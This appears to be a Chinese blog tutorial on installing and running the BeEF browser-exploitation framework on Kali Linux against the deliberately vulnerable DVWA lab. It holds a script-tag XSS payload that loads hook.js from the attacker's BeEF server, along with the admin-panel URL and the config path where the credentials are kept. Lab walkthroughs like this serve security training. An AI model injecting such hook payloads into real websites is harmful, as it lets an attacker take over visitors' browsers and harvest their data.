在kali环境下安装Beef-Xss靶场搭建

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

[5、点击 Hook me:将配置的页面导入BEEF中](#5、点击 Hook me:将配置的页面导入BEEF中)


一、更新安装包

┌──(root㉿kali)-[/home/kali]

└─# apt-get update

二、安装beef-xss

┌──(root㉿kali)-[/home/kali]

└─# apt-get install beef-xss

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂,功能之多

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

3、查看用户名和登录密码

┌──(root㉿kali)-[/home/kali]

└─# cd /usr/share/beef-xss

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# ls -al

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# vim /etc/beef-xss/config.yaml

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后:

此时BEEF中监控已经上线:

可获取http请求头,服务器类型,IP地址等信息

攻击连接意图:

相关推荐
江湖没什么好的3 天前
原型链污染
xss
taolichao304 天前
XSS内容分享
前端·xss
dydydydydszjl4 天前
xss漏洞
前端·xss
2201_753436954 天前
xss-labs解答
android·php·xss
long_mingyue5 天前
JavaScript 对象操作、继承与模块化实现
javascript·原型模式·xss
x_SpiderMan5 天前
XSS原型与原型链
前端·原型模式·xss
password大鸭梨5 天前
xss跨站脚本攻击
网络·web安全·xss
lq_ioi_pl5 天前
XSS GAME靶场
前端·javascript·xss
绘世繁星5 天前
XSS Game前八关
java·前端·xss
Neolock5 天前
从一开始的网络攻防(四):XSS
前端·网络·安全·web安全·xss